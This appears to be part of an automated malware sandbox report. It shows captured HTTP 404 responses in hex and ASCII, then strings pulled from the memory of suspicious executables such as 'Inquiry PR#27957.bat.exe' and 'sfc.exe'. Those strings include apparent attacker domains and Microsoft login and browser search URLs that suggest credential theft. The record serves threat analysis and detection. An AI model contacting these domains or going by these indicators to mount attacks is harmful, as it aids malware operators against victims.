            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Jul 2024 10:10:19 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Jul 2024 10:10:22 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Jul 2024 10:10:30 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Jul 2024 10:10:35 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Jul 2024 10:11:09 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Jul 2024 10:11:12 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Jul 2024 10:11:14 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Jul 2024 10:11:17 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: Inquiry PR#27957.bat.exe, fuqwoDzun.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: Inquiry PR#27957.bat.exe, fuqwoDzun.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: Inquiry PR#27957.bat.exe, fuqwoDzun.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: Inquiry PR#27957.bat.exe, 00000000.00000002.1351958774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, fuqwoDzun.exe, 0000000A.00000002.1568631756.0000000002779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: TsdBVAGjsKVoi.exe, 00000015.00000002.3791731697.0000000005105000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.9988566a4.shop
            Source: TsdBVAGjsKVoi.exe, 00000015.00000002.3791731697.0000000005105000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.9988566a4.shop/roex/
            Source: sfc.exe, 00000011.00000002.3790282223.00000000043AE000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.000000000382E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.globaltrend.xyz
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sfc.exe, 00000011.00000002.3792533848.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3790282223.0000000003D66000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.00000000031E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://badges.ausowned.com.au/07634
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sfc.exe, 00000011.00000002.3790282223.0000000004864000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.0000000003CE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sfc.exe, 00000011.00000002.3790282223.000000000421C000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.000000000369C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: sfc.exe, 00000011.00000002.3790282223.00000000046D2000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.0000000003B52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://http.gn301.com:12345/?u=
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sfc.exe, 00000011.00000003.1952419416.0000000007C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sfc.exe, 00000011.00000002.3786127793.0000000000B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
